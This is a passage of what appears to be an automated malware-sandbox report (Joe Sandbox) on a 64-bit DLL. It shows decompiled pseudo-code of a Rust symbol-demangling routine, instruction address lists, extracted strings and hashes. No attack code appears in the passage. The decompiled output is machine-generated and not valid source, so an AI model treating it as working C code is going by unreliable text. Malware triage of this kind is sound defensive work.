				signed int _t206;
				signed int _t213;
				signed int _t215;
				signed char _t217;
				signed char _t219;
				signed int _t232;
				signed int _t238;
				signed char _t239;
				void* _t243;
				signed int _t247;
				signed int _t267;
				signed int _t274;
				signed int _t285;
				signed int _t289;
				signed int _t293;
				signed int _t303;
				signed int _t311;
				signed int _t320;
				signed int _t327;
				signed int _t337;
				void* _t341;
				void* _t355;
				signed int _t359;
				void* _t362;
				intOrPtr _t373;
				void* _t375;
				signed int _t395;
				void* _t404;
				void* _t423;
				void* _t432;
				void* _t437;
				void* _t447;
				signed char* _t450;
				intOrPtr _t453;
				intOrPtr _t459;
				void* _t463;
				void* _t464;
				signed long long _t465;
				long long* _t469;
				void* _t472;
				signed long long _t484;
				void* _t485;
				void* _t487;
				signed short* _t492;
				signed short* _t498;
				signed short* _t500;
				signed char* _t501;
				signed char* _t505;
				signed char* _t509;
				signed long long _t511;
				void* _t512;
				intOrPtr _t513;
				signed long long _t515;
				signed char* _t517;
				void* _t523;
				void* _t527;
				void* _t530;
				intOrPtr _t532;
				void* _t535;
				signed long long _t543;
				signed long long _t547;
				signed long long _t548;
				void* _t549;
				signed short* _t551;
				void* _t556;
				signed char* _t557;
				signed char* _t558;
				long long _t562;
				signed long long _t563;
				void* _t567;
				signed long long _t574;
				signed long long _t577;
				void* _t578;
				long long _t579;
				intOrPtr _t581;
				intOrPtr _t584;
				signed char* _t585;
				signed long long _t587;
				intOrPtr _t589;
				intOrPtr _t592;
				long long _t593;
				intOrPtr _t594;
				void* _t597;
				intOrPtr _t600;
				void* _t602;
				void* _t603;
				long long _t605;
				intOrPtr _t612;
				signed short* _t613;
				signed short* _t614;
				intOrPtr _t615;
				signed short* _t624;

				_t204 = __ebx;
				 *((long long*)(_t549 + 0x20)) = 6;
				_t2 = _t549 + 0x40; // -6
				E000007FE7FEF3057B70(_t2, __rdx, __r8, ".llvm.C:\\Users\\runneradmin\\.cargo\\registry\\src\\github.com-1ecc6299db9ec823\\rustc-demangle-0.1.21\\src\\lib.rs");
				 *((long long*)(_t549 + 0xb8)) = __rcx;
				if ( *((long long*)(_t549 + 0x60)) == 0) goto 0xf3070a79;
				 *((long long*)(_t549 + 0xa8)) = __r8;
				 *((long long*)(_t549 + 0xb0)) = __rdx;
				_t532 =  *((intOrPtr*)(_t549 + 0x98));
				_t551 =  *(_t549 + 0x40);
				_t511 =  *(_t549 + 0x48);
				_t615 =  *((intOrPtr*)(_t549 + 0x50));
				_t612 =  *((intOrPtr*)(_t549 + 0x58));
				if (_t532 == 0xffffffff) goto 0xf3070abf;
				_t594 =  *((intOrPtr*)(_t549 + 0x88));
				_t341 = _t612 + _t594 - 1 - _t511;
				if (_t341 >= 0) goto 0xf3070bd7;
				_t587 =  *((intOrPtr*)(_t549 + 0x68));
				_t450 =  *((intOrPtr*)(_t549 + 0x78));
				 *(_t549 + 0x30) = _t450;
				 *((long long*)(_t549 + 0x28)) = _t612 - _t450;
				 *(_t549 + 0x38) =  ~_t587;
				asm("dec ecx");
				if (_t341 >= 0) goto 0xf3070a10;
				_t482 =  >  ? _t587 : _t532;
				_t472 =  >  ? _t587 : _t532;
				if (_t472 - _t612 >= 0) goto 0xf3070a30;
				if (_t472 + _t594 - _t511 >= 0) goto 0xf3070cc1;
				if (( *(_t615 + _t472) & 0x000000ff) ==  *((intOrPtr*)(_t551 + _t594 + _t472))) goto 0xf30709e0;
				goto 0xf3070a13;
				_t597 = _t594 +  *(_t549 + 0x38) + _t472 + 1 + _t612;
				if (_t612 - 1 + _t597 - _t511 < 0) goto 0xf30709c0;
				goto 0xf3070bd7;
				asm("o16 nop [cs:eax+eax]");
				_t484 = _t587;
				asm("o16 nop [cs:eax+eax]");
				if (_t532 - _t484 >= 0) goto 0xf3070d0e;
				_t485 = _t484 - 1;
				if (_t485 - _t612 >= 0) goto 0xf3071495;
				_t523 = _t485 + _t597;
				if (_t523 - _t511 >= 0) goto 0xf3070cd9;
				if (( *(_t615 + _t485) & 0x000000ff) ==  *((intOrPtr*)(_t551 + _t523))) goto 0xf3070a40;
				goto 0xf3070a15;
				_t34 = _t549 + 0xc0; // 0x7a
				_t35 = _t549 + 0x40; // -6
				asm("o16 nop [cs:eax+eax]");
				_t512 = _t35;
				E000007FE7FEF306F2D0(_t34, _t512);
				_t453 =  *((intOrPtr*)(_t549 + 0xc0));
				if (_t453 == 1) goto 0xf3070a90;
				if (_t453 != 0) goto 0xf3070e43;
				goto 0xf3070d1e;
				_t600 =  *((intOrPtr*)(_t549 + 0x88));
				if (_t612 + _t600 - 1 - _t512 >= 0) goto 0xf3070bd7;
				_t487 = _t612 - 1;
				_t584 =  *((intOrPtr*)(_t549 + 0x80));
				_t581 =  *((intOrPtr*)(_t549 + 0x68));
				 *((long long*)(_t549 + 0x28)) =  *((intOrPtr*)(_t549 + 0x78));
				_t543 = _t581 - 1;
				 *(_t549 + 0x38) = _t543 - _t612 > 0;
				 *(_t549 + 0x30) = _t615 + _t581 - 1;
				goto 0xf3070b36;
				asm("o16 nop [cs:eax+eax]");
				_t535 = _t600 + _t612;
				_t527 = _t535 + _t487;
				_t602 = _t535;
				_t355 = _t527 - _t512;
				if (_t355 >= 0) goto 0xf3070bd7;
				asm("dec ecx");
				if (_t355 >= 0) goto 0xf3070b20;
				_t567 = _t602;
				if (_t581 + _t527 - _t612 >= 0) goto 0xf3070b7e;
				if (_t581 + _t567 - _t512 >= 0) goto 0xf3070cea;
				if (( *(_t615 + _t581) & 0x000000ff) ==  *((intOrPtr*)(_t551 + _t581 + _t567))) goto 0xf3070b50;
				goto 0xf3070b26;
				_t359 =  *(_t549 + 0x38) & 0x00000001;
				if (_t359 == 0) goto 0xf3070d05;
				_t530 = _t543 + _t602;
				asm("o16 nop [eax+eax]");
				if (_t359 < 0) goto 0xf3070d0e;
				if (_t530 - _t512 >= 0) goto 0xf3070cd9;
				if (( *( *(_t549 + 0x30)) & 0x000000ff) ==  *((intOrPtr*)(_t551 + _t530))) goto 0xf3070ba0;
				_t603 = _t602 +  *((intOrPtr*)(_t549 + 0x28));
				goto 0xf3070b26;
				_t613 =  *((intOrPtr*)(_t549 + 0xb0));
				_t589 =  *((intOrPtr*)(_t549 + 0xa8));
				_t362 = _t589 - 3;
				if (_t362 < 0) goto 0xf3070e4d;
				if (_t362 == 0) goto 0xf3070c39;
				if (( *_t613 & 0x0000ffff) == 0x4e5a) goto 0xf3070c6e;
				_t459 = _t589;
				r12d = 3;
				if (_t459 - 4 < 0) goto 0xf3070f49;
				_t513 = _t459;
				if ( *_t613 == 0x4e5a5f5f) goto 0xf3070c90;
				goto 0xf3070f49;
				r11d = 3;
				if (_t513 - 4 < 0) goto 0xf3070c85;
				if (_t613[1] - 0xbf > 0) goto 0xf3070e79;
				 *((long long*)(_t549 + 0x20)) = 0xf3120f60;
				r8d = 3;
				goto 0xf3071457;
				if (_t613[1] - 0xbf <= 0) goto 0xf3071445;
				goto 0xf3070e73;
				r12d = 3;
				goto 0xf3070e79;
				r11d = 4;
				if (_t513 - 5 < 0) goto 0xf3070cb6;
				if (_t613[2] - 0xbf <= 0) goto 0xf3071473;
				goto 0xf3070e79;
				r12d = 4;
				goto 0xf3070e79;
				_t489 =  >  ? _t513 : _t487 + _t603;
				E000007FE7FEF30FE1A0(_t204, _t613[1] & 0x000000ff ^ 0x0000004e |  *_t613 & 0x0000ffff ^ 0x00005a5f, _t243, 0, _t513 - _t487 + _t603,  >  ? _t513 : _t487 + _t603, _t513, 0xf314aad0, _t543, _t584);
				asm("ud2");
				E000007FE7FEF30FE1A0(_t204, _t613[1] & 0x000000ff ^ 0x0000004e |  *_t613 & 0x0000ffff ^ 0x00005a5f, _t243, 0, _t513 - _t487 + _t603, _t530 - 1, _t513, 0xf314ab00, _t543, _t584);
				asm("ud2");
				_t605 =  >  ? _t513 : _t603 + _t581;
				E000007FE7FEF30FE1A0(_t204, _t613[1] & 0x000000ff ^ 0x0000004e |  *_t613 & 0x0000ffff ^ 0x00005a5f, _t243, 0, _t513 - _t603 + _t581, _t605, _t513, 0xf314aad0, _t543, _t584);
				asm("ud2");
				_t373 = _t581;
				if (_t373 != 0) goto 0xf3071492;
				_t614 =  *((intOrPtr*)(_t549 + 0xb0));
				_t592 =  *((intOrPtr*)(_t549 + 0xa8));
				_t556 = _t605 + 6;
				if (_t373 == 0) goto 0xf3070d46;
				if (_t556 - _t592 >= 0) goto 0xf3070d44;
				_t375 =  *((char*)(_t614 + _t556)) - 0xbf;
				if (_t375 > 0) goto 0xf3070d46;
				 *((long long*)(_t549 + 0x20)) = 0xf31215a0;
				goto 0xf3071457;
				if (_t375 != 0) goto 0xf3070d33;
				if (_t556 != _t592) goto 0xf3070d87;
				if (_t605 == 0) goto 0xf30713d7;
				if (_t605 - _t592 >= 0) goto 0xf3070ebf;
				if ( *((char*)(_t614 + _t605)) - 0xbf > 0) goto 0xf3070ec5;
				 *((long long*)(_t549 + 0x20)) = 0xf31215b8;
				_t492 = _t614;
				r8d = 0;
				E000007FE7FEF30FE410(_t204, _t613[1] & 0x000000ff ^ 0x0000004e |  *_t613 & 0x0000ffff ^ 0x00005a5f, _t243, 0,  *((char*)(_t614 + _t605)) - 0xbf, _t492, _t592, _t556, _t605, _t584);
				asm("ud2");
				_t463 = _t614 + _t592;
				_t557 = _t556 + _t614;
				goto 0xf3070d95;
				if (_t557 == _t463) goto 0xf3070d4b;
				_t205 =  *_t557 & 0x000000ff;
				_t232 = _t205 & 0x000000ff;
				if (_t232 < 0) goto 0xf3070db0;
				_t558 =  &(_t557[1]);
				goto 0xf3070e20;
				asm("o16 nop [cs:eax+eax]");
				if (_t232 - 0xdf <= 0) goto 0xf3070dfb;
				_t285 = (_t558[1] & 0x3f) << 6;
				if (_t205 - 0xf0 < 0) goto 0xf3070e08;
				_t247 = (_t232 & 7) << 0x12;
				_t311 = (_t558[2] & 0x3f | _t285) << 6;
				if ((_t558[3] & 0x3f | _t311 | _t247) == 0x110000) goto 0xf3070d4b;
				goto 0xf3070e20;
				goto 0xf3070e20;
				_t238 = _t311 | (_t247 << 0x00000006 | _t285) << 0x0000000c;
				asm("o16 nop [cs:eax+eax]");
				if (_t492 - 0x41 - 6 < 0) goto 0xf3070d90;
				if (_t238 - 0x30 < 0) goto 0xf3070e43;
				if (_t238 - 0x3a < 0) goto 0xf3070d90;
				if (_t238 == 0x40) goto 0xf3070d90;
				if (_t592 - 3 >= 0) goto 0xf3070bf1;
				if (_t592 != 2) goto 0xf30713d7;
				if (( *_t614 & 0x0000ffff) != 0x4e5a) goto 0xf3070f98;
				r12d = 2;
				r11d = 2;
				_t585 = _t584 + _t614;
				asm("o16 nop [cs:eax+eax]");
				if (0xfffffffe == _t463) goto 0xf3070ea5;
				_t464 = _t463 + 1;
				if (_t585[_t463] >= 0) goto 0xf3070e90;
				goto 0xf3070f43;
				if (0xfffffffe + _t592 == 0) goto 0xf3070f43;
				_t239 =  *_t585 & 0x000000ff;
				_t206 = _t239 & 0x000000ff;
				_t395 = _t206;
				if (_t395 < 0) goto 0xf3070ed7;
				goto 0xf3070f2e;
				if (_t395 != 0) goto 0xf3070d68;
				_t593 = _t605;
				if (_t593 - 3 < 0) goto 0xf3070e4d;
				goto 0xf3070bf1;
				if (_t206 - 0xdf <= 0) goto 0xf3070f18;
				if (_t239 - 0xf0 < 0) goto 0xf3070f25;
				goto 0xf3070f2e;
				goto 0xf3070f2e;
				_t213 = (_t206 & 7) << 0x00000012 << 0x00000006 | _t585[3] & 0x3f | (_t585[2] & 0x3f | (_t585[1] & 0x3f) << 0x00000006) << 0x00000006 | (_t206 & 7) << 0x00000012 | ((_t206 & 7) << 0x00000012 << 0x00000006 | _t585[3] & 0x3f | (_t585[2] & 0x3f | (_t585[1] & 0x3f) << 0x00000006) << 0x00000006 | (_t206 & 7) << 0x00000012) << 0x0000000c;
				if (_t213 == 0x45) goto 0xf307113f;
				if (_t213 != 0x110000) goto 0xf3071156;
				if (_t593 - 3 < 0) goto 0xf3070f98;
				if (( *_t614 & 0x0000ffff) == 0x525f) goto 0xf3070fc2;
				if ( *_t614 == 0x52) goto 0xf3070fa8;
				_t404 = _t593 - 3;
				if (_t404 <= 0) goto 0xf30713d7;
				if (_t404 != 0) goto 0xf30713d7;
				if ((_t614[1] & 0x000000ff) - 0xbf <= 0) goto 0xf3071467;
				goto 0xf3070fda;
				r12d = 2;
				if ( *_t614 != 0x52) goto 0xf30713d7;
				if ((_t614[0] & 0x000000ff) - 0xbf <= 0) goto 0xf30713fa;
				goto 0xf3070fda;
				_t186 = _t614[1] & 0x000000ff;
				if (_t186 - 0xbf <= 0) goto 0xf307140e;
				_t624 =  &(_t614[1]);
				if (_t186 + 0xbf - 0x19 > 0) goto 0xf30713d7;
				if (0xfffffffe == _t464) goto 0xf3071005;
				_t465 = _t464 + 1;
				if ( *((char*)(_t624 + _t464)) >= 0) goto 0xf3070ff0;
				goto 0xf30713d7;
				 *(_t549 + 0x40) = _t624;
				 *(_t549 + 0x48) = 0xfffffffe;
				 *((long long*)(_t549 + 0x50)) = 0;
				 *((intOrPtr*)(_t549 + 0x58)) = 0;
				 *((long long*)(_t549 + 0x60)) = 0;
				 *((intOrPtr*)(_t549 + 0x68)) = 0;
				E000007FE7FEF306BA30();
				if (0 != 0) goto 0xf3071417;
				_t498 =  *(_t549 + 0x40);
				if (_t498 == 0) goto 0xf30713d7;
				_t547 = _t543 << 0x20;
				r9d =  *((intOrPtr*)(_t549 + 0x49));
				_t562 =  *((intOrPtr*)(_t549 + 0x50));
				_t574 = ( &(_t585[0xfffffffffffffffe]) | _t547) << 0x00000008 | _t465;
				if (_t562 - _t574 >= 0) goto 0xf307110c;
				_t191 = ( *(_t498 + _t562) & 0x000000ff) + 0xbf;
				if (_t191 - 0x1a >= 0) goto 0xf307110c;
				asm("movsd xmm0, [esp+0x58]");
				 *(_t549 + 0x40) = _t498;
				 *(_t549 + 0x48) = _t574;
				 *((long long*)(_t549 + 0x50)) = _t562;
				asm("movlps [esp+0x58], xmm0");
				 *((long long*)(_t549 + 0x60)) = 0;
				 *((intOrPtr*)(_t549 + 0x68)) = 0;
				E000007FE7FEF306BA30();
				if (_t191 != 0) goto 0xf3071417;
				_t500 =  *(_t549 + 0x40);
				if (_t500 == 0) goto 0xf30713d7;
				_t548 = _t547 << 0x20;
				r9d =  *((intOrPtr*)(_t549 + 0x49));
				_t563 =  *((intOrPtr*)(_t549 + 0x50));
				_t577 = (_t574 | _t548) << 0x00000008 | _t465;
				if (_t563 == 0) goto 0xf30712c3;
				if (_t577 - _t563 <= 0) goto 0xf30712bd;
				if ( *((char*)(_t500 + _t563)) - 0xbf > 0) goto 0xf30712c3;
				 *((long long*)(_t549 + 0x20)) = 0xf31211e0;
				_t515 = _t577;
				E000007FE7FEF30FE410(_t213, _t614[1] & 0x000000ff ^ 0x00000052 |  *_t614 & 0x0000ffff ^ 0x00005f5f, ( *(_t549 + 0x4f) & 0x000000ff) << 0x10, _t285,  *((char*)(_t500 + _t563)) - 0xbf, _t500, _t515, _t563, _t577, _t585);
				asm("ud2");
				r13d = 0;
				_t578 = _t577 - _t500;
				if (_t578 != 0) goto 0xf30712d5;
				r9d = 0;
				goto 0xf30713aa;
				r13d = 0;
				r8d = 0xa;
				if (_t213 + 0xffffffd0 - 9 > 0) goto 0xf3070f43;
				goto 0xf307117f;
				_t501 = _t500 + 1;
				_t128 = _t515 - 0x30; // -253
				_t215 = _t128;
				_t423 = _t215 - 0xa;
				if (_t423 >= 0) goto 0xf307121e;
				if ((_t215 & 0xffffff00 | _t423 > 0x00000000) != 0) goto 0xf3070f43;
				if ((0 * _t563 >> 0x00000020 & 0xffffff00 | _t423 > 0x00000000) != 0) goto 0xf3070f43;
				if (_t501 == _t578) goto 0xf3070f43;
				_t217 =  *_t501 & 0x000000ff;
				_t267 = _t217 & 0x000000ff;
				if (_t267 >= 0) goto 0xf3071170;
				if (_t267 - 0xdf <= 0) goto 0xf30711fe;
				_t303 = (_t501[1] & 0x3f) << 6;
				if (_t217 - 0xf0 < 0) goto 0xf307120e;
				_t320 = (_t267 & 7) << 0x12;
				_t289 = (_t501[2] & 0x3f | _t303) << 6;
				if ((_t501[3] & 0x3f | _t289 | _t320) == 0x110000) goto 0xf3070f43;
				goto 0xf3071173;
				goto 0xf3071173;
				goto 0xf3071173;
				if (0xffde62423c0 != 0) goto 0xf307123e;
				_t432 = (_t289 | (_t320 << 0x00000006 | _t303) << 0x0000000c) - 0x45;
				if (_t432 != 0) goto 0xf307115f;
				goto 0xf3071142;
				_t505 =  &(_t501[0xa]);
				if (_t432 == 0) goto 0xf3071223;
				if (_t505 == _t578) goto 0xf3070f43;
				_t219 =  *_t505 & 0x000000ff;
				_t274 = _t219 & 0x000000ff;
				if (_t274 >= 0) goto 0xf3071236;
				if (_t274 - 0xdf <= 0) goto 0xf307129e;
				r10d = _t505[2] & 0x000000ff;
				_t293 = (_t505[1] & 0x3f) << 6;
				r10d = r10d & 0x0000003f;
				r10d = r10d | _t293;
				if (_t219 - 0xf0 < 0) goto 0xf30712ab;
				_t327 = (_t274 & 7) << 0x12;
				r10d = r10d << 6;
				_t437 = (_t505[3] & 0x3f | r10d | _t327) - 0x110000;
				if (_t437 == 0) goto 0xf3070f43;
				goto 0xf3071239;
				goto 0xf3071239;
				r10d = r10d | (_t327 << 0x00000006 | _t293) << 0x0000000c;
				goto 0xf3071239;
				if (_t437 != 0) goto 0xf3071129;
				_t509 =  &(( &(_t505[9]))[_t563]);
				_t579 = _t578 - _t563;
				r11d = 0;
				if (_t579 == 0) goto 0xf307114e;
				if ( *_t509 != 0x2e) goto 0xf30713d7;
				_t517 = _t509;
				if (0x2e >= 0) goto 0xf3071370;
				goto 0xf3071307;
				asm("o16 nop [eax+eax]");
				_t198 =  *_t517 & 0x000000ff;
				if (0x2e >= 0) goto 0xf3071370;
				if (0x2e - 0xdf <= 0) goto 0xf307134c;
				if (0x2e - 0xf0 < 0) goto 0xf3071359;
				if ((_t517[3] & 0x3f | (_t517[2] & 0x3f | (_t517[1] & 0x3f) << 0x00000006) << 0x00000006 | (_t198 & 7) << 0x00000012) == 0x110000) goto 0xf30713aa;
				goto 0xf3071376;
				goto 0xf3071376;
				goto 0xf3071376;
				asm("o16 nop [cs:eax+eax]");
				_t337 = _t198 & 0x000000ff;
				if (_t548 - 0x21 - 0x19 < 0) goto 0xf30713a1;
				if ((_t337 & 0xffffffdf) + 0xffffffbf - 0x1a < 0) goto 0xf30713a1;
				_t203 = _t548 - 0x5b;
				_t447 = _t203 - 0x23;
				if (_t447 > 0) goto 0xf3071399;
				asm("dec ecx");
				if (_t447 < 0) goto 0xf30713a1;
				if (_t337 + 0xffffffc6 - 7 >= 0) goto 0xf30713d7;
				if ( &(_t517[0xa]) !=  &(_t509[_t579])) goto 0xf3071300;
				_t469 =  *((intOrPtr*)(_t549 + 0xb8));
				 *_t469 = 1;
				 *(_t469 + 8) = _t585;
				 *(_t469 + 0x10) = _t624;
				 *((long long*)(_t469 + 0x18)) = 0xfffffffe + _t593 + 1;
				 *(_t469 + 0x20) = _t614;
				 *((long long*)(_t469 + 0x28)) = _t593;
				 *(_t469 + 0x30) = _t509;
				 *((long long*)(_t469 + 0x38)) = _t579;
				goto 0xf30713e6;
				 *((long long*)( *((intOrPtr*)(_t549 + 0xb8)))) = 2;
				return _t203;
			}

0x7fef30708f0
0x7fef307090c
0x7fef307091c
0x7fef3070921
0x7fef307092c
0x7fef3070934
0x7fef307093a
0x7fef3070942
0x7fef307094a
0x7fef3070952
0x7fef3070957
0x7fef307095c
0x7fef3070961
0x7fef307096a
0x7fef3070970
0x7fef307097f
0x7fef3070982
0x7fef3070994
0x7fef3070999
0x7fef30709a1
0x7fef30709a9
0x7fef30709b4
0x7fef30709c5
0x7fef30709c9
0x7fef30709d1
0x7fef30709d9
0x7fef30709e3
0x7fef30709ec
0x7fef3070a01
0x7fef3070a0b
0x7fef3070a10
0x7fef3070a1c
0x7fef3070a1e
0x7fef3070a23
0x7fef3070a30
0x7fef3070a33
0x7fef3070a43
0x7fef3070a49
0x7fef3070a4f
0x7fef3070a55
0x7fef3070a5c
0x7fef3070a6b
0x7fef3070a77
0x7fef3070a79
0x7fef3070a81
0x7fef3070a86
0x7fef3070a93
0x7fef3070a96
0x7fef3070a9b
0x7fef3070aa7
0x7fef3070aac
0x7fef3070aba
0x7fef3070abf
0x7fef3070ad1
0x7fef3070ad7
0x7fef3070adb
0x7fef3070ae3
0x7fef3070aed
0x7fef3070af2
0x7fef3070af9
0x7fef3070b09
0x7fef3070b11
0x7fef3070b13
0x7fef3070b23
0x7fef3070b26
0x7fef3070b2a
0x7fef3070b2d
0x7fef3070b30
0x7fef3070b3b
0x7fef3070b3f
0x7fef3070b43
0x7fef3070b57
0x7fef3070b60
0x7fef3070b7a
0x7fef3070b7c
0x7fef3070b7e
0x7fef3070b83
0x7fef3070b8f
0x7fef3070b9a
0x7fef3070ba4
0x7fef3070bad
0x7fef3070bc5
0x7fef3070bc7
0x7fef3070bd2
0x7fef3070bd7
0x7fef3070bdf
0x7fef3070be7
0x7fef3070beb
0x7fef3070c05
0x7fef3070c10
0x7fef3070c12
0x7fef3070c15
0x7fef3070c1f
0x7fef3070c25
0x7fef3070c2f
0x7fef3070c34
0x7fef3070c40
0x7fef3070c4a
0x7fef3070c51
0x7fef3070c5e
0x7fef3070c63
0x7fef3070c69
0x7fef3070c73
0x7fef3070c80
0x7fef3070c85
0x7fef3070c8b
0x7fef3070c97
0x7fef3070ca1
0x7fef3070ca8
0x7fef3070cb1
0x7fef3070cb6
0x7fef3070cbc
0x7fef3070cc7
0x7fef3070cd2
0x7fef3070cd7
0x7fef3070ce3
0x7fef3070ce8
0x7fef3070cf0
0x7fef3070cfe
0x7fef3070d03
0x7fef3070d05
0x7fef3070d08
0x7fef3070d0e
0x7fef3070d16
0x7fef3070d21
0x7fef3070d25
0x7fef3070d2a
0x7fef3070d2c
0x7fef3070d31
0x7fef3070d3a
0x7fef3070d3f
0x7fef3070d44
0x7fef3070d49
0x7fef3070d4e
0x7fef3070d57
0x7fef3070d62
0x7fef3070d6f
0x7fef3070d74
0x7fef3070d7a
0x7fef3070d80
0x7fef3070d85
0x7fef3070d87
0x7fef3070d8b
0x7fef3070d8e
0x7fef3070d93
0x7fef3070d95
0x7fef3070d99
0x7fef3070d9e
0x7fef3070da0
0x7fef3070da3
0x7fef3070da5
0x7fef3070dc0
0x7fef3070dc7
0x7fef3070dd2
0x7fef3070ddc
0x7fef3070ddf
0x7fef3070def
0x7fef3070df9
0x7fef3070e06
0x7fef3070e11
0x7fef3070e13
0x7fef3070e26
0x7fef3070e2f
0x7fef3070e34
0x7fef3070e3d
0x7fef3070e47
0x7fef3070e51
0x7fef3070e60
0x7fef3070e6d
0x7fef3070e73
0x7fef3070e79
0x7fef3070e85
0x7fef3070e93
0x7fef3070e9a
0x7fef3070e9e
0x7fef3070ea0
0x7fef3070ea8
0x7fef3070eae
0x7fef3070eb2
0x7fef3070eb5
0x7fef3070eb7
0x7fef3070ebd
0x7fef3070ebf
0x7fef3070ec5
0x7fef3070ecc
0x7fef3070ed2
0x7fef3070ee7
0x7fef3070ef9
0x7fef3070f16
0x7fef3070f23
0x7fef3070f2c
0x7fef3070f31
0x7fef3070f3d
0x7fef3070f47
0x7fef3070f52
0x7fef3070f58
0x7fef3070f5a
0x7fef3070f5e
0x7fef3070f78
0x7fef3070f85
0x7fef3070f96
0x7fef3070f98
0x7fef3070fa2
0x7fef3070faf
0x7fef3070fc0
0x7fef3070fc2
0x7fef3070fc9
0x7fef3070fcf
0x7fef3070fde
0x7fef3070ff3
0x7fef3070ffa
0x7fef3070ffe
0x7fef3071000
0x7fef3071005
0x7fef307100a
0x7fef307100f
0x7fef3071018
0x7fef3071020
0x7fef3071029
0x7fef3071038
0x7fef307103f
0x7fef3071045
0x7fef307104d
0x7fef3071067
0x7fef307106b
0x7fef3071073
0x7fef307107c
0x7fef3071082
0x7fef307108d
0x7fef3071091
0x7fef3071093
0x7fef3071099
0x7fef307109e
0x7fef30710a3
0x7fef30710a8
0x7fef30710ad
0x7fef30710b6
0x7fef30710c5
0x7fef30710cc
0x7fef30710d2
0x7fef30710da
0x7fef30710f4
0x7fef30710f8
0x7fef3071100
0x7fef3071109
0x7fef307110f
0x7fef3071118
0x7fef3071123
0x7fef3071130
0x7fef3071135
0x7fef3071138
0x7fef307113d
0x7fef307113f
0x7fef3071142
0x7fef3071148
0x7fef307114e
0x7fef3071151
0x7fef3071156
0x7fef3071159
0x7fef3071165
0x7fef307116d
0x7fef3071170
0x7fef3071173
0x7fef3071173
0x7fef3071176
0x7fef3071179
0x7fef3071192
0x7fef307119a
0x7fef30711a3
0x7fef30711a9
0x7fef30711ac
0x7fef30711b1
0x7fef30711c2
0x7fef30711c8
0x7fef30711d3
0x7fef30711dc
0x7fef30711df
0x7fef30711ef
0x7fef30711f9
0x7fef3071209
0x7fef3071219
0x7fef3071221
0x7fef3071228
0x7fef307122b
0x7fef3071231
0x7fef3071236
0x7fef307123c
0x7fef3071241
0x7fef3071247
0x7fef307124a
0x7fef307124f
0x7fef3071260
0x7fef3071262
0x7fef3071267
0x7fef307126a
0x7fef307126e
0x7fef3071274
0x7fef307127d
0x7fef3071280
0x7fef307128c
0x7fef3071292
0x7fef307129c
0x7fef30712a9
0x7fef30712b2
0x7fef30712b8
0x7fef30712bd
0x7fef30712c3
0x7fef30712c6
0x7fef30712c9
0x7fef30712cf
0x7fef30712d8
0x7fef30712ee
0x7fef30712f3
0x7fef30712f5
0x7fef30712f7
0x7fef3071300
0x7fef3071305
0x7fef3071318
0x7fef3071328
0x7fef3071344
0x7fef307134a
0x7fef3071357
0x7fef3071364
0x7fef3071366
0x7fef3071373
0x7fef307137c
0x7fef3071389
0x7fef307138b
0x7fef307138e
0x7fef3071391
0x7fef3071393
0x7fef3071397
0x7fef307139f
0x7fef30713a4
0x7fef30713aa
0x7fef30713b2
0x7fef30713b9
0x7fef30713bd
0x7fef30713c1
0x7fef30713c5
0x7fef30713c9
0x7fef30713cd
0x7fef30713d1
0x7fef30713d5
0x7fef30713df
0x7fef30713f9

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF3071E66
__ZN, xrefs: 000007FEF3070C28
::::1, xrefs: 000007FEF30717AA, 000007FEF307185B
.llvm.C:\Users\runneradmin\.cargo\registry\src\github.com-1ecc6299db9ec823\rustc-demangle-0.1.21\src\lib.rs, xrefs: 000007FEF3070915
`fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 000007FEF3071423

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID:
String ID: .llvm.C:\Users\runneradmin\.cargo\registry\src\github.com-1ecc6299db9ec823\rustc-demangle-0.1.21\src\lib.rs$::::1$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 0-3314675744
Opcode ID: 8389df908120c71de2612021f2f461f209732031c2ff85bd53e1c2b4d4657f47
Instruction ID: e1651b1aa406c92778bee349d1aa5223a3067d5f7d366b49466d4bb1a32dfd43
Opcode Fuzzy Hash: 8389df908120c71de2612021f2f461f209732031c2ff85bd53e1c2b4d4657f47
Instruction Fuzzy Hash: D7C23272E1CA9249EBE88B1194043BA6BD3E3857A4FC44233EA9E477F5D63CE545E304

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A38A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E000007FE7FEF30A38A0(void* __edx, void* __eflags, void* __rax, long long* __rcx, void* __rdx) {
				intOrPtr _v32;
				long long _v40;
				long long _v48;
				unsigned long long _v56;
				signed long long _v64;
				char _v72;
				void* _t14;
				signed long long _t26;
				intOrPtr _t40;
				void* _t41;
				signed long long _t42;
				long long* _t45;

				asm("int 0x29");
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(_t41);
				if (__eflags == 0) goto 0xf30a394c;
				_t45 = __rcx;
				_t26 =  *((intOrPtr*)(__rcx + 8));
				_t35 =  >  ? _t26 + _t26 : __rdx + 1;
				_t42 =  >=  ?  >  ? _t26 + _t26 : __rdx + 1 : _t41;
				if (_t26 == 0) goto 0xf30a390b;
				_v72 =  *((intOrPtr*)(__rcx));
				_v64 = _t26;
				_v56 =  !_t26 >> 0x3f;
				goto 0xf30a3914;
				_v56 = 0;
				E000007FE7FEF30977C0(_t26,  &_v48, _t42,  !_t42 >> 0x3f,  &_v72);
				if (_v48 == 0) goto 0xf30a3953;
				_t40 = _v32;
				if (_t40 == 0x1) goto 0xf30a395a;
				if (_t40 != 0) goto 0xf30a3961;
				_t14 = E000007FE7FEF30511E0();
				asm("ud2");
				 *_t45 = _v40;
				 *(_t45 + 8) = _t42;
				return _t14;
			}

